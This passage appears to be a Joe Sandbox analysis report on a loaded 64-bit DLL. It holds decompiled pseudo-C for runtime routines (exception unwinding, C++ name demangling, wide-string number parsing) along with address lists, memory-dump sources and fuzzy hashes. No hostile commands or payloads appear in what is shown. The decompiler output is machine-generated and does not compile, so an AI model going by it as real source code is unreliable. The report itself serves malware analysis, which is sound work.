                                                                      				E0000000118000E96C(_t236,  *((intOrPtr*)(_t281 - 0x80)), _t280, _t281, _t279, _t281 - 0x78);
                                                                      				_t176 =  *((intOrPtr*)(_t281 + 0x98));
                                                                      				 *(_t283 + 0x50) = _t176;
                                                                      				_t177 = _t176 | 0xffffffff;
                                                                      				 *((long long*)(_t283 + 0x48)) = _t280;
                                                                      				 *(_t283 + 0x40) = _t304;
                                                                      				 *(_t283 + 0x38) = _t177;
                                                                      				 *(_t283 + 0x30) = _t177;
                                                                      				 *(_t283 + 0x28) = _t279;
                                                                      				 *(_t283 + 0x20) = _t304;
                                                                      				E0000000118000ED44( *((intOrPtr*)(_t281 - 0x80)), _t236,  *((intOrPtr*)(_t283 + 0x68)), _t234);
                                                                      				goto 0x80010810;
                                                                      				if (_t279[3] <= 0) goto 0x80010810;
                                                                      				if ( *((char*)(_t281 + 0x98)) != 0) goto 0x80010883;
                                                                      				 *(_t283 + 0x38) = _t304;
                                                                      				 *(_t283 + 0x30) =  *(_t281 + 0xa0);
                                                                      				 *(_t283 + 0x28) = r14d;
                                                                      				 *(_t283 + 0x20) = _t279;
                                                                      				E00000001180010D88(_t236, _t236,  *((intOrPtr*)(_t281 - 0x80)),  *(_t281 - 0x58) >> 0x20, _t280);
                                                                      				_t172 = E0000000118000E0F4(_t234);
                                                                      				if ( *((long long*)(_t234 + 0x38)) != 0) goto 0x80010883;
                                                                      				return E000000011800028F0(_t172, _t177,  *(_t281 + 0x10) ^ _t283);
                                                                      			}
































                                                                      0x1800103d1
                                                                      0x1800103d6
                                                                      0x1800103dd
                                                                      0x1800103e4
                                                                      0x1800103e7
                                                                      0x1800103eb
                                                                      0x1800103f5
                                                                      0x1800103ff
                                                                      0x180010404
                                                                      0x180010407
                                                                      0x180010411
                                                                      0x180010418
                                                                      0x18001041d
                                                                      0x180010420
                                                                      0x180010425
                                                                      0x18001042b
                                                                      0x180010434
                                                                      0x180010440
                                                                      0x18001044a
                                                                      0x18001045b
                                                                      0x180010466
                                                                      0x18001046c
                                                                      0x180010476
                                                                      0x18001047c
                                                                      0x180010481
                                                                      0x180010485
                                                                      0x18001048e
                                                                      0x180010497
                                                                      0x18001049c
                                                                      0x1800104a7
                                                                      0x1800104ad
                                                                      0x1800104ba
                                                                      0x1800104c1
                                                                      0x1800104c7
                                                                      0x1800104d1
                                                                      0x1800104d3
                                                                      0x1800104dc
                                                                      0x1800104e7
                                                                      0x1800104f3
                                                                      0x1800104ff
                                                                      0x180010505
                                                                      0x180010513
                                                                      0x180010517
                                                                      0x180010521
                                                                      0x18001052b
                                                                      0x18001053c
                                                                      0x180010542
                                                                      0x180010549
                                                                      0x180010559
                                                                      0x180010564
                                                                      0x180010569
                                                                      0x18001056c
                                                                      0x180010571
                                                                      0x180010575
                                                                      0x18001057a
                                                                      0x18001057f
                                                                      0x180010586
                                                                      0x18001058c
                                                                      0x180010590
                                                                      0x180010594
                                                                      0x1800105a4
                                                                      0x1800105b3
                                                                      0x1800105bd
                                                                      0x1800105c0
                                                                      0x1800105c4
                                                                      0x1800105cb
                                                                      0x1800105d5
                                                                      0x1800105dc
                                                                      0x1800105e9
                                                                      0x1800105f1
                                                                      0x1800105f8
                                                                      0x180010605
                                                                      0x180010609
                                                                      0x180010611
                                                                      0x180010614
                                                                      0x180010625
                                                                      0x180010628
                                                                      0x18001062d
                                                                      0x18001063a
                                                                      0x18001063d
                                                                      0x180010643
                                                                      0x180010645
                                                                      0x180010660
                                                                      0x18001066b
                                                                      0x180010671
                                                                      0x180010677
                                                                      0x180010679
                                                                      0x18001067f
                                                                      0x180010681
                                                                      0x180010687
                                                                      0x18001068d
                                                                      0x1800106a7
                                                                      0x1800106af
                                                                      0x1800106b7
                                                                      0x1800106c2
                                                                      0x1800106ca
                                                                      0x1800106d3
                                                                      0x1800106dc
                                                                      0x1800106e1
                                                                      0x1800106e6
                                                                      0x1800106f0
                                                                      0x1800106f3
                                                                      0x1800106fa
                                                                      0x180010710
                                                                      0x180010716
                                                                      0x18001071a
                                                                      0x18001071c
                                                                      0x180010728
                                                                      0x180010732
                                                                      0x180010745
                                                                      0x180010753
                                                                      0x18001075d
                                                                      0x18001075f
                                                                      0x180010767
                                                                      0x18001076e
                                                                      0x18001077d
                                                                      0x180010790
                                                                      0x180010795
                                                                      0x1800107a6
                                                                      0x1800107aa
                                                                      0x1800107ad
                                                                      0x1800107b2
                                                                      0x1800107b7
                                                                      0x1800107bb
                                                                      0x1800107c2
                                                                      0x1800107c7
                                                                      0x1800107cc
                                                                      0x1800107d1
                                                                      0x1800107d7
                                                                      0x1800107e0
                                                                      0x1800107ef
                                                                      0x1800107f7
                                                                      0x1800107fe
                                                                      0x180010806
                                                                      0x18001080b
                                                                      0x180010810
                                                                      0x18001081a
                                                                      0x18001083b

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 3606184308-393685449
                                                                      • Opcode ID: 83983e45d2570fdddc52d168bf20dd4954e8664624b439f344d92da66154f3ae
                                                                      • Instruction ID: f48904d0a2062b0254eb6c841efe487a34593a976f3a593cb0838b23e494017e
                                                                      • Opcode Fuzzy Hash: 83983e45d2570fdddc52d168bf20dd4954e8664624b439f344d92da66154f3ae
                                                                      • Instruction Fuzzy Hash: 28D1AF72604B888AEBA2DF65D4403DE37A0F7497D8F208115FE8957B9ACF74D299C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E0000000118000AFFC(void* __edx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, void* __rsi, void* __r8, void* __r14, void* __r15, long long _a8, long long _a16) {
                                                                      				char _v24;
                                                                      				intOrPtr _v32;
                                                                      				char _v40;
                                                                      				intOrPtr _v48;
                                                                      				void* _v56;
                                                                      				intOrPtr _t49;
                                                                      				char* _t66;
                                                                      				char* _t69;
                                                                      				char* _t70;
                                                                      				char* _t73;
                                                                      				long long* _t82;
                                                                      				intOrPtr* _t94;
                                                                      				intOrPtr* _t100;
                                                                      
                                                                      				_t102 = __rsi;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rdi;
                                                                      				_t66 =  *0x80071308; // 0x0
                                                                      				_t82 = __rcx;
                                                                      				_t100 = __rdx;
                                                                      				if ( *_t66 == 0) goto 0x8000b198;
                                                                      				if (r8d == 0) goto 0x8000b0b6;
                                                                      				if ( *_t66 != 0x58) goto 0x8000b09a;
                                                                      				 *0x80071308 = _t66 + 1;
                                                                      				_t94 =  &_v40;
                                                                      				if ( *__rdx != __rcx) goto 0x8000b06e;
                                                                      				_v48 = 4;
                                                                      				_v56 = "void";
                                                                      				asm("movaps xmm0, [ebp-0x30]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E000000011800059CC("void", __rcx, _t94);
                                                                      				goto 0x8000b1b5;
                                                                      				_t69 = "void ";
                                                                      				_v48 = 5;
                                                                      				_v56 = _t69;
                                                                      				asm("movaps xmm0, [ebp-0x30]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E000000011800059CC(_t69,  &_v24, _t94);
                                                                      				goto 0x8000b1aa;
                                                                      				if ( *_t69 != 0x5f) goto 0x8000b0b6;
                                                                      				if ( *((char*)(_t69 + 1)) != 0x5f) goto 0x8000b0b6;
                                                                      				if ( *((char*)(_t69 + 2)) != 0x5a) goto 0x8000b0b6;
                                                                      				_t70 = _t69 + 3;
                                                                      				 *0x80071308 = _t70;
                                                                      				if ( *_t70 != 0x24) goto 0x8000b101;
                                                                      				if ( *((char*)(_t70 + 1)) != 0x24) goto 0x8000b11d;
                                                                      				if ( *((char*)(_t70 + 2)) != 0x54) goto 0x8000b11d;
                                                                      				 *0x80071308 = _t70 + 3;
                                                                      				if ( *_t94 != _t69) goto 0x8000b0ee;
                                                                      				_v48 = 0xe;
                                                                      				goto 0x8000b054;
                                                                      				_t73 = "std::nullptr_t ";
                                                                      				_v48 = 0xf;
                                                                      				goto 0x8000b07c;
                                                                      				if ( *_t73 != 0x59) goto 0x8000b11d;
                                                                      				 *0x80071308 = _t73 + 1;
                                                                      				E000000011800078B0(0, __edx, __edi, __rcx, __rcx,  &_v40, __rdx, __rsi);
                                                                      				goto 0x8000b1b5;
                                                                      				E00000001180007BF0(__edi, _t82,  &_v56,  &_v40, _t100, _t102, __r14, __r15);
                                                                      				if (( *(_t100 + 8) & 0x00004000) == 0) goto 0x8000b170;
                                                                      				_t75 = "cli::array<";
                                                                      				_v32 = 0xb;
                                                                      				_v40 = "cli::array<";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E000000011800059CC("cli::array<",  &_v24,  &_v40);
                                                                      				E00000001180005F48(_t75,  &_v40,  &_v56);
                                                                      				goto 0x8000b190;
                                                                      				if (( *(_t100 + 8) & 0x00002000) == 0) goto 0x8000b189;
                                                                      				_v32 = 0xd;
                                                                      				goto 0x8000b13d;
                                                                      				_t49 = _v48;
                                                                      				 *_t82 = _v56;
                                                                      				 *((intOrPtr*)(_t82 + 8)) = _t49;
                                                                      				goto 0x8000b1b5;
                                                                      				_v32 = _t49;
                                                                      				_v40 = 0x8005f780;
                                                                      				return E00000001180005F48( &_v40, _t82, _t100);
                                                                      			}
















                                                                      0x18000affc
                                                                      0x18000affc
                                                                      0x18000b001
                                                                      0x18000b00e
                                                                      0x18000b015
                                                                      0x18000b01a
                                                                      0x18000b01f
                                                                      0x18000b028
                                                                      0x18000b031
                                                                      0x18000b036
                                                                      0x18000b040
                                                                      0x18000b044
                                                                      0x18000b04d
                                                                      0x18000b054
                                                                      0x18000b05b
                                                                      0x18000b05f
                                                                      0x18000b064
                                                                      0x18000b069
                                                                      0x18000b06e
                                                                      0x18000b075
                                                                      0x18000b07c
                                                                      0x18000b084
                                                                      0x18000b088
                                                                      0x18000b08d
                                                                      0x18000b095
                                                                      0x18000b09d
                                                                      0x18000b0a3
                                                                      0x18000b0a9
                                                                      0x18000b0ab
                                                                      0x18000b0af
                                                                      0x18000b0b9
                                                                      0x18000b0bf
                                                                      0x18000b0c5
                                                                      0x18000b0cb
                                                                      0x18000b0d9
                                                                      0x18000b0e2
                                                                      0x18000b0e9
                                                                      0x18000b0ee
                                                                      0x18000b0f5
                                                                      0x18000b0fc
                                                                      0x18000b104
                                                                      0x18000b10c
                                                                      0x18000b113
                                                                      0x18000b118
                                                                      0x18000b121
                                                                      0x18000b12d
                                                                      0x18000b12f
                                                                      0x18000b136
                                                                      0x18000b13d
                                                                      0x18000b145
                                                                      0x18000b14d
                                                                      0x18000b152
                                                                      0x18000b162
                                                                      0x18000b16e
                                                                      0x18000b177
                                                                      0x18000b180
                                                                      0x18000b187
                                                                      0x18000b189
                                                                      0x18000b190
                                                                      0x18000b193
                                                                      0x18000b196
                                                                      0x18000b19f
                                                                      0x18000b1a2
                                                                      0x18000b1c7

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                      • API String ID: 2943138195-2239912363
                                                                      • Opcode ID: 57498e1908925ba54620f78a8a842b5eb9505d122cc75619e9d288b6dde95e7c
                                                                      • Instruction ID: 7d4372cffa0d92e46b808f24c86e9dca5a601dd074ad7c68841e9c159a41594a
                                                                      • Opcode Fuzzy Hash: 57498e1908925ba54620f78a8a842b5eb9505d122cc75619e9d288b6dde95e7c
                                                                      • Instruction Fuzzy Hash: 03512D72A14B5898FB92CF64D8953ED77B0B74C788F84C125EB4963B95DF788288CB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID: W(
                                                                      • API String ID: 2506987500-612300789
                                                                      • Opcode ID: 2baf13e377c4e23e97929a1fce4123e6b703bb2814f9b3f1d73961cda4267355
                                                                      • Instruction ID: bc1816109030ffcba6a05e958861f3a4807aedcebaa0406cd8467394bf3409a6
                                                                      • Opcode Fuzzy Hash: 2baf13e377c4e23e97929a1fce4123e6b703bb2814f9b3f1d73961cda4267355
                                                                      • Instruction Fuzzy Hash: 1E21AE30300A4C41FAEFA735A6553FA5382AB8CBF0F12C716B976477D7DE29864A4301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 56%
                                                                      			E00000001180037A44(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, void* __r10, long long _a8, intOrPtr _a16, long long _a24) {
                                                                      				void* _v64;
                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr _v84;
                                                                      				intOrPtr _v88;
                                                                      				intOrPtr _v92;
                                                                      				intOrPtr _v96;
                                                                      				intOrPtr _v100;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				intOrPtr _v112;
                                                                      				intOrPtr _v116;
                                                                      				intOrPtr _v120;
                                                                      				intOrPtr _v124;
                                                                      				intOrPtr _v128;
                                                                      				intOrPtr _v132;
                                                                      				intOrPtr _v136;
                                                                      				intOrPtr _v140;
                                                                      				intOrPtr _v144;
                                                                      				intOrPtr _v148;
                                                                      				intOrPtr _v152;
                                                                      				long long _v160;
                                                                      				long long _v168;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t156;
                                                                      				void* _t186;
                                                                      				signed short _t200;
                                                                      				signed short _t201;
                                                                      				signed int _t202;
                                                                      				signed int _t251;
                                                                      				signed int _t253;
                                                                      				signed int _t255;
                                                                      				signed int _t256;
                                                                      				signed int _t259;
                                                                      				signed int _t262;
                                                                      				signed short* _t381;
                                                                      				signed short* _t382;
                                                                      				signed short* _t383;
                                                                      				signed short* _t385;
                                                                      				signed short** _t386;
                                                                      				long long _t387;
                                                                      				long long* _t390;
                                                                      				signed short* _t391;
                                                                      				long long* _t395;
                                                                      				long long* _t396;
                                                                      				long long* _t397;
                                                                      				signed short** _t398;
                                                                      				void* _t399;
                                                                      				void* _t400;
                                                                      				signed short* _t405;
                                                                      				signed short* _t406;
                                                                      				long long _t408;
                                                                      				signed short* _t409;
                                                                      				long long _t410;
                                                                      				intOrPtr _t411;
                                                                      
                                                                      				_t395 = __rdx;
                                                                      				_t387 = __rbx;
                                                                      				_a24 = __rbx;
                                                                      				_a8 = __rcx;
                                                                      				_t408 =  *((intOrPtr*)(__rdx));
                                                                      				r13d = 0;
                                                                      				_t256 = r9b & 0xffffffff;
                                                                      				r14d = r8d;
                                                                      				_v64 = _t408;
                                                                      				_t398 = __rdx;
                                                                      				if (_t408 != 0) goto 0x80037a8f;
                                                                      				E00000001180013B18(__rax);
                                                                      				 *__rax = 0x16;
                                                                      				E00000001180013928();
                                                                      				goto 0x80037ac1;
                                                                      				if (r14d == 0) goto 0x80037ad9;
                                                                      				if (__r8 - 2 - 0x22 <= 0) goto 0x80037ad9;
                                                                      				_v160 = __rcx;
                                                                      				r9d = 0;
                                                                      				 *((char*)(__rcx + 0x30)) = 1;
                                                                      				r8d = 0;
                                                                      				 *(__rcx + 0x2c) = 0x16;
                                                                      				_v168 = _t410;
                                                                      				E00000001180013858(__rax, __rbx, __rcx, __rdx, _t399, _t400, __r8);
                                                                      				_t390 = _t398[1];
                                                                      				if (_t390 == 0) goto 0x80038125;
                                                                      				 *_t390 =  *_t398;
                                                                      				goto 0x80038125;
                                                                      				 *_t395 = _t408 + 2;
                                                                      				_t261 = r13d;
                                                                      				if ( *((intOrPtr*)(_t390 + 0x28)) != r13b) goto 0x80037b03;
                                                                      				E000000011800338E0(_t408 + 2, _t387, _t390, _t395, _t399);
                                                                      				goto 0x80037b03;
                                                                      				_t379 =  *_t398;
                                                                      				 *_t398 =  &(( *_t398)[1]);
                                                                      				if (E00000001180041E84( *_t379 & 0xffff, 8, _t387, _t390) != 0) goto 0x80037af6;
                                                                      				_t258 =  !=  ? _t256 : _t256 | 0x00000002;
                                                                      				if ((0x0000fffd & _t387 - 0x0000002b) != 0) goto 0x80037b3a;
                                                                      				_t381 =  *_t398;
                                                                      				_t200 =  *_t381 & 0x0000ffff;
                                                                      				_t382 =  &(_t381[1]);
                                                                      				 *_t398 = _t382;
                                                                      				_a16 = 0xa70;
                                                                      				_v152 = 0xae6;
                                                                      				_v148 = 0xaf0;
                                                                      				_v144 = 0xb66;
                                                                      				r8d = 0x660;
                                                                      				_v140 = 0xb70;
                                                                      				_t20 = _t382 - 0x80; // 0x5e0
                                                                      				r9d = _t20;
                                                                      				_v136 = 0xc66;
                                                                      				r10d = 0x6f0;
                                                                      				_v132 = 0xc70;
                                                                      				r11d = 0x966;
                                                                      				_v128 = 0xce6;
                                                                      				_v124 = 0xcf0;
                                                                      				_v120 = 0xd66;
                                                                      				_v116 = 0xd70;
                                                                      				_v112 = 0xe50;
                                                                      				_v108 = 0xe5a;
                                                                      				_v104 = 0xed0;
                                                                      				_v100 = 0xeda;
                                                                      				_v96 = 0xf20;
                                                                      				_v92 = 0xf2a;
                                                                      				_v88 = 0x1040;
                                                                      				_v84 = 0x104a;
                                                                      				_v80 = 0x17e0;
                                                                      				_v76 = 0x17ea;
                                                                      				_v72 = 0x1810;
                                                                      				_v68 = 0xff1a;
                                                                      				if ((r14d & 0xffffffef) != 0) goto 0x80037ea8;
                                                                      				if (_t200 - 0x30 < 0) goto 0x80037df7;
                                                                      				if (_t200 - 0x3a >= 0) goto 0x80037c46;
                                                                      				goto 0x80037df2;
                                                                      				if (_t200 - 0xff10 >= 0) goto 0x80037de3;
                                                                      				if (_t200 - r8w < 0) goto 0x80037df7;
                                                                      				if (_t200 - 0x66a >= 0) goto 0x80037c6e;
                                                                      				goto 0x80037df2;
                                                                      				if (_t200 - r10w < 0) goto 0x80037df7;
                                                                      				if (_t200 - 0x6fa >= 0) goto 0x80037c8d;
                                                                      				goto 0x80037df2;
                                                                      				if (_t200 - r11w < 0) goto 0x80037df7;
                                                                      				if (_t200 - 0x970 >= 0) goto 0x80037cac;
                                                                      				goto 0x80037df2;
                                                                      				if (_t200 - r9w < 0) goto 0x80037df7;
                                                                      				if (_t200 - 0x9f0 >= 0) goto 0x80037ccb;
                                                                      				goto 0x80037df2;
                                                                      				if (_t200 - (_t200 & 0x0000ffff) - r9d < 0) goto 0x80037df7;
                                                                      				if (_t200 - _a16 >= 0) goto 0x80037ceb;
                                                                      				goto 0x80037df2;
                                                                      				if (_t200 - _v152 < 0) goto 0x80037df7;
                                                                      				if (_t200 - _v148 < 0) goto 0x80037c3c;
                                                                      				if (_t200 - _v144 < 0) goto 0x80037df7;
                                                                      				if (_t200 - _v140 < 0) goto 0x80037c3c;
                                                                      				if (_t200 - _v136 < 0) goto 0x80037df7;
                                                                      				if (_t200 - _v132 < 0) goto 0x80037c3c;
                                                                      				if (_t200 - _v128 < 0) goto 0x80037df7;
                                                                      				if (_t200 - _v124 < 0) goto 0x80037c3c;
                                                                      				if (_t200 - _v120 < 0) goto 0x80037df7;
                                                                      				if (_t200 - _v116 < 0) goto 0x80037c3c;
                                                                      				if (_t200 - _v112 < 0) goto 0x80037df7;
                                                                      				if (_t200 - _v108 < 0) goto 0x80037c3c;
                                                                      				if (_t200 - _v104 < 0) goto 0x80037df7;
                                                                      				if (_t200 - _v100 < 0) goto 0x80037c3c;
                                                                      				if (_t200 - _v96 < 0) goto 0x80037df7;
                                                                      				if (_t200 - _v92 < 0) goto 0x80037c3c;
                                                                      				if (_t200 - _v88 < 0) goto 0x80037df7;
                                                                      				if (_t200 - _v84 < 0) goto 0x80037c3c;
                                                                      				if (_t200 - _v80 < 0) goto 0x80037df7;
                                                                      				if (_t200 - _v76 < 0) goto 0x80037c3c;
                                                                      				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x80037df7;
                                                                      				goto 0x80037c3c;
                                                                      				if (_t200 - _v68 >= 0) goto 0x80037df7;
                                                                      				if ((_t200 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x80037e19;
                                                                      				_t64 = _t390 - 0x41; // -17
                                                                      				_t65 = _t390 - 0x61; // -49
                                                                      				_t156 = _t65;
                                                                      				if (_t64 - 0x19 <= 0) goto 0x80037e0e;
                                                                      				if (_t156 - 0x19 > 0) goto 0x80037e99;
                                                                      				if (_t156 - 0x19 > 0) goto 0x80037e16;
                                                                      				_t66 = _t390 - 0x37; // -231
                                                                      				if (_t66 != 0) goto 0x80037e99;
                                                                      				_t391 =  *_t398;
                                                                      				r9d = 0xffdf;
                                                                      				_t251 =  *_t391 & 0x0000ffff;
                                                                      				_t67 =  &(_t391[1]); // 0xffe1
                                                                      				_t405 = _t67;
                                                                      				 *_t398 = _t405;
                                                                      				_t68 = _t395 - 0x58; // 0x698
                                                                      				if ((r9w & _t68) == 0) goto 0x80037e81;
                                                                      				 *_t398 = _t391;
                                                                      				_t160 =  !=  ? r14d : 8;
                                                                      				r14d =  !=  ? r14d : 8;
                                                                      				if (_t251 == 0) goto 0x80037e79;
                                                                      				if ( *_t391 == _t251) goto 0x80037e79;
                                                                      				E00000001180013B18(_t382);
                                                                      				 *_t382 = 0x16;
                                                                      				E00000001180013928();
                                                                      				r8d = 0x660;
                                                                      				r10d = 0x6f0;
                                                                      				r11d = 0x966;
                                                                      				goto 0x80037ea8;
                                                                      				r8d = 0x660;
                                                                      				goto 0x80037ea8;
                                                                      				_t201 =  *_t405 & 0x0000ffff;
                                                                      				_t71 =  &(_t405[1]); // 0xffe3
                                                                      				_t383 = _t71;
                                                                      				 *_t398 = _t383;
                                                                      				r8d = 0x660;
                                                                      				goto 0x80037e9e;
                                                                      				_t165 =  !=  ? r14d : 0xa;
                                                                      				r14d = 0xa;
                                                                      				_t166 = ( !=  ? r14d : 0xa) | 0xffffffff;
                                                                      				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                      				_t253 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                      				r12d = 0x30;
                                                                      				r15d = 0xff10;
                                                                      				r9d = 0xa / r14d;
                                                                      				if (_t201 - r12w < 0) goto 0x80038078;
                                                                      				if (_t201 - 0x3a >= 0) goto 0x80037eda;
                                                                      				goto 0x80038073;
                                                                      				if (_t201 - r15w >= 0) goto 0x80038063;
                                                                      				if (_t201 - r8w < 0) goto 0x80038078;
                                                                      				if (_t201 - 0x66a >= 0) goto 0x80037f03;
                                                                      				goto 0x80038073;
                                                                      				if (_t201 - r10w < 0) goto 0x80038078;
                                                                      				if (_t201 - 0x6fa >= 0) goto 0x80037f22;
                                                                      				goto 0x80038073;
                                                                      				if (_t201 - r11w < 0) goto 0x80038078;
                                                                      				if (_t201 - 0x970 >= 0) goto 0x80037f41;
                                                                      				goto 0x80038073;
                                                                      				if (_t201 - 0x9e6 < 0) goto 0x80038078;
                                                                      				_t76 =  &(_t383[5]); // 0x9f0
                                                                      				if (_t201 - _t76 >= 0) goto 0x80037f61;
                                                                      				goto 0x80038073;
                                                                      				if (_t201 - 0xa66 < 0) goto 0x80038078;
                                                                      				if (_t201 - _a16 < 0) goto 0x80037f57;
                                                                      				if (_t201 - _v152 < 0) goto 0x80038078;
                                                                      				if (_t201 - _v148 < 0) goto 0x80037f57;
                                                                      				if (_t201 - _v144 < 0) goto 0x80038078;
                                                                      				if (_t201 - _v140 < 0) goto 0x80037f57;
                                                                      				if (_t201 - _v136 < 0) goto 0x80038078;
                                                                      				if (_t201 - _v132 < 0) goto 0x80037f57;
                                                                      				if (_t201 - _v128 < 0) goto 0x80038078;
                                                                      				if (_t201 - _v124 < 0) goto 0x80037f57;
                                                                      				if (_t201 - _v120 < 0) goto 0x80038078;
                                                                      				if (_t201 - _v116 < 0) goto 0x80037f57;
                                                                      				if (_t201 - _v112 < 0) goto 0x80038078;
                                                                      				if (_t201 - _v108 < 0) goto 0x80037f57;
                                                                      				if (_t201 - _v104 < 0) goto 0x80038078;
                                                                      				if (_t201 - _v100 < 0) goto 0x80037f57;
                                                                      				if (_t201 - _v96 < 0) goto 0x80038078;
                                                                      				if (_t201 - _v92 < 0) goto 0x80037f57;
                                                                      				if (_t201 - _v88 < 0) goto 0x80038078;
                                                                      				if (_t201 - _v84 < 0) goto 0x80037f57;
                                                                      				if (_t201 - _v80 < 0) goto 0x80038078;
                                                                      				if (_t201 - _v76 < 0) goto 0x80037f57;
                                                                      				if ((_t201 & 0x0000ffff) - _v72 - 9 > 0) goto 0x80038078;
                                                                      				goto 0x80038073;
                                                                      				if (_t201 - _v68 >= 0) goto 0x80038078;
                                                                      				if ((_t201 & 0x0000ffff) - r15d != 0xffffffff) goto 0x8003809b;
                                                                      				_t100 = _t391 - 0x41; // -65
                                                                      				_t101 = _t391 - 0x61; // -97
                                                                      				_t186 = _t101;
                                                                      				if (_t100 - 0x19 <= 0) goto 0x8003808b;
                                                                      				if (_t186 - 0x19 > 0) goto 0x80038098;
                                                                      				if (_t186 - 0x19 > 0) goto 0x80038093;
                                                                      				goto 0x8003809b;
                                                                      				_t406 =  *_t398;
                                                                      				if (((_t201 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x800380df;
                                                                      				_t202 =  *_t406 & 0x0000ffff;
                                                                      				_t255 = _t383 + _t391;
                                                                      				_t262 = _t255;
                                                                      				r8d = 0x660;
                                                                      				 *_t398 =  &(_t406[1]);
                                                                      				_t259 = ( !=  ? _t256 : _t256 | 0x00000002) | (r13d & 0xffffff00 | _t255 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t261 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                      				goto 0x80037ebf;
                                                                      				_t411 = _a8;
                                                                      				_t385 = _t406 - 2;
                                                                      				_t409 = _v64;
                                                                      				 *_t398 = _t385;
                                                                      				if (_t202 == 0) goto 0x80038110;
                                                                      				if ( *_t385 == _t202) goto 0x80038110;
                                                                      				E00000001180013B18(_t385);
                                                                      				 *_t385 = 0x16;
                                                                      				E00000001180013928();
                                                                      				if ((sil & 0x00000008) != 0) goto 0x8003812c;
                                                                      				_t386 = _t398[1];
                                                                      				 *_t398 = _t409;
                                                                      				if (_t386 == 0) goto 0x80038125;
                                                                      				 *_t386 = _t409;
                                                                      				goto 0x800381b0;
                                                                      				r8d = 0x80000000;
                                                                      				r9d = _t406 - 1;
                                                                      				if ((sil & 0x00000004) != 0) goto 0x80038154;
                                                                      				if ((sil & 0x00000001) == 0) goto 0x80038197;
                                                                      				if ((sil & 0x00000002) == 0) goto 0x8003814f;
                                                                      				if (_t262 - r8d <= 0) goto 0x8003819d;
                                                                      				goto 0x80038154;
                                                                      				if (_t262 - r9d <= 0) goto 0x8003819f;
                                                                      				 *((char*)(_t411 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t411 + 0x2c)) = 0x22;
                                                                      				if ((_t259 & 0x00000001) != 0) goto 0x8003816f;
                                                                      				goto 0x8003819f;
                                                                      				_t396 = _t398[1];
